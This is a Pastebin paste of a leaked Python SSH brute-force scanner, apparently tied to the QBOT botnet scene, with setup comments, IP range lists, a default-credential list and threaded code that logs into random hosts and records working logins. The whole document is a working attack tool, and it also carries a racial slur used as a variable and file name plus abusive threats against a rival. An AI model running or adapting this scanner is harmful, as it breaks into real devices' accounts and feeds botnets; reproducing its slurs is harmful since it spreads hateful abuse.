Advertisement
Suffocate

[QBOT] SSH scanner leak [QBOT

Feb 17th, 2018
4,074
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.73 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # '##::: ##::::'###::::'########:'####:
  3. # ###:: ##:::'## ##:::..... ##::. ##::
  4. # ####: ##::'##:. ##:::::: ##:::: ##::
  5. # ## ## ##:'##:::. ##:::: ##::::: ##::
  6. # ##. ####: #########::: ##:::::: ##::
  7. # ##:. ###: ##.... ##:: ##::::::: ##::
  8. # ##::. ##: ##:::: ##: ########:'####:
  9. # ..::::..::..:::::..::........::....::
  10. # If you Have this That Means you are Trusted
  11. # DO NOT TAKE PICS DO NOT SHOW ANYONE THIS DO NOT SCREEN SHARE Nazi
  12. #
  13. #
  14.  
  15.  
  16.  
  17.  
  18. # This Is Basically Kyro.py Renamed But Has All Of Skym3rks "private ranges" , leaked , pull hella enjoy fam :)
  19.  
  20. # Once Again Skym3rk : FUCK YOU you leaching FUCK!, im gonna enjoy ruining you .....
  21.  
  22. # MUST INSTALL THE FOLLOING BELOW
  23.  
  24. # yum update -y
  25.  
  26. # yum install nano -y
  27.  
  28. # yum install gcc python-paramiko -y
  29.  
  30. # nano /usr/include/bits/typesizes.h
  31.  
  32. # scroll down and edit the 1024 to 999999
  33.  
  34. # THEN SAVE IT
  35.  
  36. # ulimit -n 999999
  37.  
  38. # Usage: python Nazi.py THREADS RANGES 1(slow but effective) 2(fast but less effective) HERE IS A EXAMPLE
  39.  
  40. # python KYRO.py 500 5.78 101
  41.  
  42. # ^^^^^^^slow but affective ^^^^^^^^
  43.  
  44. # python Nazi.py 500 B 119.93 3
  45.  
  46. # ^^^^^^Fast But Not As stable^^^^^^
  47.  
  48. # Examples Below
  49.  
  50. # c
  51.  
  52. # python Nazi.py 500 LUCKY3 1 4
  53.  
  54. # python Nazi.py 500 LUCKY2 1 3
  55. #ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python sault.py 700 LUCKY 1 1
  56.  
  57. # ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python sault.py 600 B 101.108 1
  58. # ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python sault.py 600 B 190.172 1
  59. # ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python sault.py 600 B 179.41 1
  60. # ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python sault.py 600 B 119.92 3
  61. # ulimit -Hn 999999; ulimit -Sn 99999; ulimit -n 99999; sysctl -w fs.file-max=100000; python Scan.py 650 B 186.39 1
  62.  
  63. #
  64.  
  65. # RANGES , 119.93, 122.3, 122.52, 101.109, 180.180, 125.27, 101.109
  66. import threading, paramiko, random, socket, time, sys
  67.  
  68. paramiko.util.log_to_file("/dev/null")
  69.  
  70. blacklist = [
  71. '127'
  72. ]
  73.  
  74. passwords = [
  75. "telnet:telnet"
  76. "admin:1234",
  77. "root:root",
  78. "ubnt:ubnt",
  79. "vagrant:vagrant",
  80. "pi:raspberry",
  81. "root:maxided"
  82. "root:admin",
  83. "root:Love2020",
  84. "root:Zero",
  85. "root:Password",
  86. "root:password",
  87. "root:qwerty",
  88. "root:dragon",
  89. "root:pussy",
  90. "root:baseball",
  91. "root:football",
  92. "root:monkey",
  93. "root:696969",
  94. "root:abc123"
  95. "admin:admin",
  96. "admin:1234",
  97. "admin:Guest",
  98. "ubnt:ubnt",
  99. "guest:guest",
  100. "user:user",
  101. "test:test",
  102.  
  103. ]
  104.  
  105. if sys.argv[4] == '1':
  106. passwords = ["root:root"] # ALRIGHT
  107. if sys.argv[4] == '2':
  108. passwords = ["guest:guest"] #EHH
  109. if sys.argv[4] == '3':
  110. passwords = ["admin:admin"] #ALRIGHT
  111. if sys.argv[4] == '4':
  112. passwords = ["telnet:telnet"] #SEXY
  113. if sys.argv[4] == '5':
  114. passwords = ["root:root", "admin:1234", "admin:admin", "root:abc123"]
  115. if sys.argv[4] == '6':
  116. passwords = ["root:admin"]
  117.  
  118. print "\x1b[1;37m~~~~~~~~~~~~~~~~~~~\x1b[1;35m"
  119. print "\x1b[1;31m~Bruteforcing Vulnerable Devices\x1b[1;37m"
  120. print "\x1b[1;31m~Skym3rks a skid LOL\x1b[1;37m"
  121. print "\x1b[1;37m~~~~~~~~~~~~~~~~~~~\x1b[1;37m"
  122.  
  123. ipclassinfo = sys.argv[2]
  124. if ipclassinfo == "A":
  125. ip1 = sys.argv[3]
  126. elif ipclassinfo == "B":
  127. ip1 = sys.argv[3].split(".")[0]
  128. ip2 = sys.argv[3].split(".")[1]
  129. elif ipclassinfo == "C":
  130. ips = sys.argv[3].split(".")
  131. num=0
  132. for ip in ips:
  133. num=num+1
  134. if num == 1:
  135. ip1 = ip
  136. elif num == 2:
  137. ip2 = ip
  138. elif num == 3:
  139. ip3 = ip
  140. class sshscanner(threading.Thread):
  141. global passwords
  142. global ipclassinfo
  143. if ipclassinfo == "A":
  144. global ip1
  145. elif ipclassinfo == "B":
  146. global ip1
  147. global ip2
  148. elif ipclassinfo == "C":
  149. global ip1
  150. global ip2
  151. global ip3
  152. def run(self):
  153. while 1:
  154. try:
  155. while 1:
  156. thisipisbad='no'
  157. if ipclassinfo == "A":
  158. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  159. elif ipclassinfo == "B":
  160. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  161. elif ipclassinfo == "C":
  162. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  163. #DONT FUCK WITH ANY OF THIS STUFF
  164. elif ipclassinfo == "LUCKY":
  165. lucky = ["91.99","91.98","5.74","113.53", "119.92", "223.179", "101.108", "125.24", "125.25", "125.26", "119.93"]
  166. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  167. elif ipclassinfo == "LUCKY2":
  168. lucky2 = lucky2 = [ ]
  169. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  170. elif ipclassinfo == "FAST":
  171. lucky2 = [ ]
  172. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  173.  
  174. for badip in blacklist:
  175. if badip in self.host:
  176. thisipisbad='yes'
  177. if thisipisbad=='no':
  178. break
  179. username='root'
  180. password=""
  181. port = 22
  182. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  183. s.settimeout(1)
  184. s.connect((self.host, port))
  185. s.close()
  186. ssh = paramiko.SSHClient()
  187. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  188. dobreak=False
  189. for passwd in passwords:
  190. if ":n/a" in passwd:
  191. password=""
  192. else:
  193. password=passwd.split(":")[1]
  194. if "n/a:" in passwd:
  195. username=""
  196. else:
  197. username=passwd.split(":")[0]
  198. try:
  199. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  200. dobreak=True
  201. break
  202. except:
  203. pass
  204. if True == dobreak:
  205. break
  206. badserver=True
  207. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  208. output = stdout.read()
  209. if "inet addr" in output:
  210. badserver=False
  211. if badserver == False:
  212. print '\x1b[1;31mIoT Device Found! : ' +self.host+' username: '+username+' Pass: '+password+'|'+str(port)
  213. ssh.exec_command("")
  214. nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  215. time.sleep(0.5)
  216. ssh.close()
  217. except:
  218. pass
  219.  
  220. for x in range(0,1500):
  221. try:
  222. t = sshscanner()
  223. t.start()
  224. except:
  225. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement